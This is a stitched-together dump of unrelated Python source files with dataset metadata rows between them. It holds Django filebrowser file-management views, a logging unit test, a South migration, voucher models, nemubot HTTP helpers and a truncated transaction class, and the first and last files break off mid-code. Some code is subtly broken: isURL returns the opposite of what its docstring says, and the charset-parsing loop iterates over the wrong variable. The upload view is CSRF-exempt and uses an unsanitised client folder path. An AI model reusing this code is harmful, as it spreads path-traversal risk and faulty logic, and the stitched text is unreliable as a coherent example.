'breadcrumbs_title': _(u'Upload')
}, context_instance=Context(request))
upload = staff_member_required(never_cache(upload))
@csrf_exempt
def _check_file(request):
"""
Check if file already exists on the server.
"""
from django.utils import simplejson
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
fileArray = {}
if request.method == 'POST':
for k,v in request.POST.items():
if k != "folder":
v = convert_filename(v)
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, v)):
fileArray[k] = v
return HttpResponse(simplejson.dumps(fileArray))
# upload signals
filebrowser_pre_upload = Signal(providing_args=["path", "file"])
filebrowser_post_upload = Signal(providing_args=["path", "file"])
@csrf_exempt
@flash_login_required
def _upload_file(request):
"""
Upload file to the server.
"""
from django.core.files.move import file_move_safe
if request.method == 'POST':
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, folder)
if request.FILES:
filedata = request.FILES['Filedata']
filedata.name = convert_filename(filedata.name)
# PRE UPLOAD SIGNAL
filebrowser_pre_upload.send(sender=request, path=request.POST.get('folder'), file=filedata)
# HANDLE UPLOAD
uploadedfile = handle_file_upload(abs_path, filedata)
# MOVE UPLOADED FILE
# if file already exists
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, filedata.name)):
old_file = os.path.join(abs_path, filedata.name)
new_file = os.path.join(abs_path, uploadedfile)
file_move_safe(new_file, old_file)
# POST UPLOAD SIGNAL
filebrowser_post_upload.send(sender=request, path=request.POST.get('folder'), file=FileObject(os.path.join(DIRECTORY, folder, filedata.name)))
return HttpResponse('True')
#_upload_file = flash_login_required(_upload_file)
# delete signals
filebrowser_pre_delete = Signal(providing_args=["path", "filename"])
filebrowser_post_delete = Signal(providing_args=["path", "filename"])
def delete(request):
"""
Delete existing File/Directory.
When trying to delete a Directory, the Directory has to be empty.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
msg = ""
if request.GET:
if request.GET.get('filetype') != "Folder":
relative_server_path = os.path.join(DIRECTORY, path, filename)
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# DELETE FILE
os.unlink(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The file %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
except OSError:
# todo: define error message
msg = OSError
else:
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE FOLDER
os.rmdir(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The folder %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
except OSError:
# todo: define error message
msg = OSError
if msg:
request.user.message_set.create(message=msg)
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'file': request.GET.get('filename', ''),
'query': query,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, dir_name),
'breadcrumbs_title': ""
}, context_instance=Context(request))
delete = staff_member_required(never_cache(delete))
# rename signals
filebrowser_pre_rename = Signal(providing_args=["path", "filename", "new_filename"])
filebrowser_post_rename = Signal(providing_args=["path", "filename", "new_filename"])
def rename(request):
"""
Rename existing File/Directory.
Includes renaming existing Image Versions/Thumbnails.
"""
from filebrowser.forms import RenameForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
file_extension = os.path.splitext(filename)[1].lower()
if request.method == 'POST':
form = RenameForm(abs_path, file_extension, request.POST)
if form.is_valid():
relative_server_path = os.path.join(DIRECTORY, path, filename)
new_filename = form.cleaned_data['name'] + file_extension
new_relative_server_path = os.path.join(DIRECTORY, path, new_filename)
try:
# PRE RENAME SIGNAL
filebrowser_pre_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
# regenerating versions/thumbs will be done automatically
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# RENAME ORIGINAL
os.rename(os.path.join(MEDIA_ROOT, relative_server_path), os.path.join(MEDIA_ROOT, new_relative_server_path))
# POST RENAME SIGNAL
filebrowser_post_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# MESSAGE & REDIRECT
msg = _('Renaming was successful.')
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error.')])
else:
form = RenameForm(abs_path, file_extension)
return render_to_response('filebrowser/rename.html', {
'form': form,
'query': query,
'file_extension': file_extension,
'title': _(u'Rename "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Rename')
}, context_instance=Context(request))
rename = staff_member_required(never_cache(rename))
def versions(request):
"""
Show all Versions for an Image according to ADMIN_VERSIONS.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
return render_to_response('filebrowser/versions.html', {
'original': path_to_url(os.path.join(DIRECTORY, path, filename)),
'query': query,
'title': _(u'Versions for "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Versions for "%s"') % filename
}, context_instance=Context(request))
versions = staff_member_required(never_cache(versions))
| bsd-3-clause | -3,435,572,908,903,204,000 | 38.509128 | 186 | 0.599446 | false |
KSchopmeyer/smipyping | tests/test_logging.py | 1 | 3914 | #!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the components of the simpleping.py module
"""
from __future__ import absolute_import, print_function
import os
import unittest
import logging
# from testfixtures import log_capture
from smipyping._logging import get_logger, SmiPypingLoggers
VERBOSE = False
# Location of any test scripts for testing wbemcli.py
SCRIPT_DIR = os.path.dirname(__file__)
LOG_FILE_NAME = 'test_logging.log'
TEST_OUTPUT_LOG = '%s/%s' % (SCRIPT_DIR, LOG_FILE_NAME)
# TODO add test of actual logging.
class BaseLoggingTests(unittest.TestCase):
"""Base class for logging unit tests"""
def setUp(self):
SmiPypingLoggers.reset()
if os.path.isfile(TEST_OUTPUT_LOG):
os.remove(TEST_OUTPUT_LOG)
def tearDown(self):
# Close any open logging files
# Windows log files be closed to be removed.
if os.path.isfile(TEST_OUTPUT_LOG):
logger = logging.getLogger('testlogger')
if logger.handlers:
handlers = logger.handlers[:]
for handler in handlers:
handler.close()
logger.removeHandler(handler)
os.remove(TEST_OUTPUT_LOG)
def loadLogfile(self):
if os.path.isfile(TEST_OUTPUT_LOG):
with open(TEST_OUTPUT_LOG) as f:
lines = f.read().splitlines()
return lines
return None
class TestGetLogger(unittest.TestCase):
"""All test cases for get_logger()."""
def test_root_logger(self):
"""Test that get_logger('') returns the Python root logger and has at
least one handler."""
py_logger = logging.getLogger()
my_logger = get_logger('')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
def test_foo_logger(self):
"""Test that get_logger('foo') returns the Python logger 'foo'
and has at least one handler."""
py_logger = logging.getLogger('foo')
my_logger = get_logger('foo')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
class TestLoggerCreate(BaseLoggingTests):
""" Test the SmipypingLoggers.create_logger method."""
def test_create_single_logger1(self):
"""
Create a simple logger
"""
SmiPypingLoggers.prog = 'test_logging'
SmiPypingLoggers.create_logger('testlogger', log_dest='file',
log_filename=TEST_OUTPUT_LOG,
log_level='debug')
if VERBOSE:
print('smipyping_loggers dict %s' % SmiPypingLoggers.loggers)
expected_result = \
{'test_logging.testlogger': ('debug', 'file',
TEST_OUTPUT_LOG)}
self.assertEqual(SmiPypingLoggers.loggers, expected_result)
if __name__ == '__main__':
unittest.main()
| mit | 7,747,978,183,615,586,000 | 31.616667 | 77 | 0.619315 | false |
SlashRoot/WHAT | what_apps/contact/migrations/0002_auto__add_field_phonenumber_spam.py | 1 | 10616 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'PhoneNumber.spam'
db.add_column(u'contact_phonenumber', 'spam',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'PhoneNumber.spam'
db.delete_column(u'contact_phonenumber', 'spam')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contact.additionalemail': {
'Meta': {'object_name': 'AdditionalEmail'},
'contact_info': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'additional_emails'", 'to': u"orm['contact.ContactInfo']"}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'contact.contactinfo': {
'Meta': {'object_name': 'ContactInfo'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'address_line2': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'postal_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'websites': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'operators'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['social.Link']"})
},
u'contact.diallist': {
'Meta': {'object_name': 'DialList'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'contact.diallistclientparticipation': {
'Meta': {'unique_together': "(['user', 'list'],)", 'object_name': 'DialListClientParticipation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'list': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clients'", 'to': u"orm['contact.DialList']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dial_lists_as_client'", 'to': u"orm['auth.User']"})
},
u'contact.diallistparticipation': {
'Meta': {'unique_together': "(['number', 'list'],)", 'object_name': 'DialListParticipation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'green_phone': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'list': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'numbers'", 'to': u"orm['contact.DialList']"}),
'number': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dial_lists'", 'to': u"orm['contact.PhoneNumber']"})
},
u'contact.mailhandler': {
'Meta': {'object_name': 'MailHandler'},
'actions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['contact.MailHandlerAction']", 'null': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'contact.mailhandleraction': {
'Meta': {'object_name': 'MailHandlerAction'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
u'contact.mailmessage': {
'Meta': {'object_name': 'MailMessage'},
'body': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipient': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'subject': ('django.db.models.fields.TextField', [], {})
},
u'contact.message': {
'Meta': {'object_name': 'Message'},
'content': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'type': ('django.db.models.fields.IntegerField', [], {})
},
u'contact.phonenumber': {
'Meta': {'object_name': 'PhoneNumber'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.contrib.localflavor.us.models.PhoneNumberField', [], {'unique': 'True', 'max_length': '20'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'phone_numbers'", 'null': 'True', 'to': u"orm['contact.ContactInfo']"}),
'spam': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'contact.phoneprovider': {
'Meta': {'object_name': 'PhoneProvider'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'social.link': {
'Meta': {'object_name': 'Link'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['contact'] | mit | -4,250,237,107,527,121,400 | 70.255034 | 198 | 0.547287 | false |
onepercentclub/onepercentclub-site | apps/vouchers/models.py | 1 | 4574 | import random
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext as _
from django_extensions.db.fields import ModificationDateTimeField, CreationDateTimeField
from djchoices import DjangoChoices, ChoiceItem
from .mails import mail_new_voucher
class VoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
paid = ChoiceItem('paid', label=_("Paid"))
cancelled = ChoiceItem('cancelled', label=_("Cancelled"))
cashed = ChoiceItem('cashed', label=_("Cashed"))
cashed_by_proxy = ChoiceItem('cashed_by_proxy', label=_("Cashed by us"))
class Voucher(models.Model):
class VoucherLanguages(DjangoChoices):
en = ChoiceItem('en', label=_("English"))
nl = ChoiceItem('nl', label=_("Dutch"))
amount = models.PositiveIntegerField(_("Amount"))
currency = models.CharField(_("Currency"), max_length=3, default='EUR')
language = models.CharField(_("Language"), max_length=2, choices=VoucherLanguages.choices, default=VoucherLanguages.en)
message = models.TextField(_("Message"), blank=True, default="", max_length=500)
code = models.CharField(_("Code"), blank=True, default="", max_length=100)
status = models.CharField(_("Status"), max_length=20, choices=VoucherStatuses.choices, default=VoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("Created"))
updated = ModificationDateTimeField(_("Updated"))
sender = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Sender"), related_name="sender", null=True, blank=True)
sender_email = models.EmailField(_("Sender email"))
sender_name = models.CharField(_("Sender name"), blank=True, default="", max_length=100)
receiver = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Receiver"), related_name="receiver", null=True, blank=True)
receiver_email = models.EmailField(_("Receiver email"))
receiver_name = models.CharField(_("Receiver name"), blank=True, default="", max_length=100)
order = models.ForeignKey('fund.Order', verbose_name=_("Order"), related_name='vouchers', null=True)
class Meta:
# Note: This can go back to 'Voucher' when we figure out a proper way to do EN -> EN translations for branding.
verbose_name = _("Gift Card")
verbose_name_plural = _("Gift Cards")
def __unicode__(self):
code = "NEw"
if self.code:
code = self.code
return code
class CustomVoucherRequest(models.Model):
class CustomVoucherTypes(DjangoChoices):
card = ChoiceItem('card', label=_("Card"))
digital = ChoiceItem('digital', label=_("Digital"))
unknown = ChoiceItem('unknown', label=_("Unknown"))
class CustomVoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
in_progress = ChoiceItem('in progress', label=_("In progress"))
finished = ChoiceItem('finished', label=_("Finished"))
value = models.CharField(verbose_name=_("Value"), max_length=100, blank=True, default="")
number = models.PositiveIntegerField(_("Number"))
contact = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Contact member"), null=True)
contact_name = models.CharField(verbose_name=_("Contact email"), max_length=100, blank=True, default="")
contact_email = models.EmailField(verbose_name=_("Contact email"), blank=True, default="")
contact_phone = models.CharField(verbose_name=_("Contact phone"), max_length=100, blank=True, default="")
organization = models.CharField(verbose_name=_("Organisation"), max_length=200, blank=True, default="")
message = models.TextField(_("message"), default="", max_length=500, blank=True)
type = models.CharField(_("type"), max_length=20, choices=CustomVoucherTypes.choices, default=CustomVoucherTypes.unknown)
status = models.CharField(_("status"), max_length=20, choices=CustomVoucherStatuses.choices, default=CustomVoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("created"))
def process_voucher_order_in_progress(voucher):
def generate_voucher_code():
# Upper case letters without D, O, L and I; numbers without 0 and 1.
char_set = 'ABCEFGHJKMNPQRSTUVWXYZ23456789'
return ''.join(random.choice(char_set) for i in range(8))
code = generate_voucher_code()
while Voucher.objects.filter(code=code).exists():
code = generate_voucher_code()
voucher.code = code
voucher.status = VoucherStatuses.paid
voucher.save()
mail_new_voucher(voucher)
| bsd-3-clause | 1,365,753,965,112,462,600 | 46.645833 | 146 | 0.691517 | false |
Bobobol/nemubot-1 | tools/web.py | 1 | 5191 | # coding=utf-8
# Nemubot is a modulable IRC bot, built around XML configuration files.
# Copyright (C) 2012 Mercier Pierre-Olivier
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from html.entities import name2codepoint
import http.client
import json
import re
import socket
from urllib.parse import quote
from urllib.parse import urlparse
from urllib.request import urlopen
from exception import IRCException
import xmlparser
def isURL(url):
"""Return True if the URL can be parsed"""
o = urlparse(url)
return o.scheme == "" and o.netloc == "" and o.path == ""
def getScheme(url):
"""Return the protocol of a given URL"""
o = urlparse(url)
return o.scheme
def getHost(url):
"""Return the domain of a given URL"""
return urlparse(url).netloc
def getPort(url):
"""Return the port of a given URL"""
return urlparse(url).port
def getPath(url):
"""Return the page request of a given URL"""
return urlparse(url).path
def getUser(url):
"""Return the page request of a given URL"""
return urlparse(url).username
def getPassword(url):
"""Return the page request of a given URL"""
return urlparse(url).password
# Get real pages
def getURLContent(url, timeout=15):
"""Return page content corresponding to URL or None if any error occurs"""
o = urlparse(url)
if o.netloc == "":
o = urlparse("http://" + url)
if o.scheme == "http":
conn = http.client.HTTPConnection(o.netloc, port=o.port,
timeout=timeout)
elif o.scheme == "https":
conn = http.client.HTTPSConnection(o.netloc, port=o.port,
timeout=timeout)
elif o.scheme is None or o.scheme == "":
conn = http.client.HTTPConnection(o.netloc, port=80, timeout=timeout)
else:
return None
try:
if o.query != '':
conn.request("GET", o.path + "?" + o.query,
None, {"User-agent": "Nemubot v3"})
else:
conn.request("GET", o.path, None, {"User-agent": "Nemubot v3"})
except socket.timeout:
return None
except socket.gaierror:
print ("<tools.web> Unable to receive page %s on %s from %s."
% (o.path, o.netloc, url))
return None
try:
res = conn.getresponse()
size = int(res.getheader("Content-Length", 200000))
cntype = res.getheader("Content-Type")
if size > 200000 or (cntype[:4] != "text" and cntype[:4] != "appl"):
return None
data = res.read(size)
# Decode content
charset = "utf-8"
lcharset = res.getheader("Content-Type").split(";")
if len(lcharset) > 1:
for c in charset:
ch = c.split("=")
if ch[0].strip().lower() == "charset" and len(ch) > 1:
cha = ch[1].split(".")
if len(cha) > 1:
charset = cha[1]
else:
charset = cha[0]
except http.client.BadStatusLine:
raise IRCException("Invalid HTTP response")
finally:
conn.close()
if res.status == http.client.OK or res.status == http.client.SEE_OTHER:
return data.decode(charset)
elif ((res.status == http.client.FOUND or
res.status == http.client.MOVED_PERMANENTLY) and
res.getheader("Location") != url):
return getURLContent(res.getheader("Location"), timeout)
else:
raise IRCException("A HTTP error occurs: %d - %s" %
(res.status, http.client.responses[res.status]))
def getXML(url, timeout=15):
"""Get content page and return XML parsed content"""
cnt = getURLContent(url, timeout)
if cnt is None:
return None
else:
return xmlparser.parse_string(cnt.encode())
def getJSON(url, timeout=15):
"""Get content page and return JSON content"""
cnt = getURLContent(url, timeout)
if cnt is None:
return None
else:
return json.loads(cnt.decode())
# Other utils
def htmlentitydecode(s):
"""Decode htmlentities"""
return re.sub('&(%s);' % '|'.join(name2codepoint),
lambda m: chr(name2codepoint[m.group(1)]), s)
def striphtml(data):
"""Remove HTML tags from text"""
p = re.compile(r'<.*?>')
return htmlentitydecode(p.sub('', data)
.replace("(", "/(")
.replace(")", ")/")
.replace(""", "\""))
| agpl-3.0 | 6,018,492,426,457,182,000 | 29.535294 | 78 | 0.592949 | false |
ushatil/wellness-tracker | ws/wellspring/services/vest_service.py | 1 | 1420 | import logging
from wellspring.models import VestSection, VestSubSection
LOGGER = logging.getLogger(__name__)
VEST_SECTIONS = {
"EQUILIBRIUM" : ["SCHOOL", "SELF", "HOME", "WORK"],
"SUPPORT" : ["PROFESSIONALS", "FAMILY", "FRIENDS", "COLLEAGUES"],
"LIFESTYLE" : ["DIET", "EXERCISE", "MEDITATION", "RECREATION"]
}
def add_section(name):
LOGGER.debug("Adding VestSection: " + name)
result = VestSection(section_name=name)
result.save()
return result
def add_subsection(section_name, subsection_name):
LOGGER.debug("Adding VestSubSection: " + section_name + ":" + subsection_name)
vest_section = get_by_name_vest_section(section_name)
result = VestSubSection(vest_section=vest_section, subsection_name=subsection_name)
result.save()
return result
def get_all_vest_section():
LOGGER.debug("Getting all VestSections")
return list(VestSection.objects.all())
def get_all_vest_subsection():
LOGGER.debug("Getting all VestSubSections")
return list(VestSubSection.objects.all())
def get_by_name_vest_section(name):
LOGGER.debug("Getting VestSection by name: " + name)
return VestSection.objects.get(section_name = name)
def get_by_name_vest_subsection(name):
LOGGER.debug("Getting VestSubSection by name: " + name)
return VestSubSection.objects.get(subsection_name = name) | mit | 4,386,219,538,674,025,000 | 35.435897 | 87 | 0.671831 | false |
frdwrd/bifocal | bifocal/models/transaction.py | 1 | 3366 | # Copyright (c) 2013-2015, Vehbi Sinan Tunalioglu <[email protected]>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (See http://opensource.org/licenses/BSD-2-Clause)
from .. import utils
class Transaction(object):
def __init__(self, timestamp, quantity, asset, **kwargs):
self.quantity = quantity
try:
self.price = float(kwargs['price']) if 'price' in kwargs else 0.0
except ValueError:
raise ValueError('Invalid price: %s' % kwargs['price'])
self.timestamp = timestamp
self.asset = asset
self.data = kwargs
if type(self.quantity) is not int:
raise ValueError('Invalid quantity: %s' % self.quantity)
if type(self.timestamp) is not int:
raise ValueError('Invalid timestamp: %s' % self.timestamp)
def __eq__(self, other):
for key, value in self.data.iteritems():
if key not in other.data:
return False
if value != other.data[key]:
return False
if self.quantity != other.quantity:
return False
if self.price != other.price:
return False
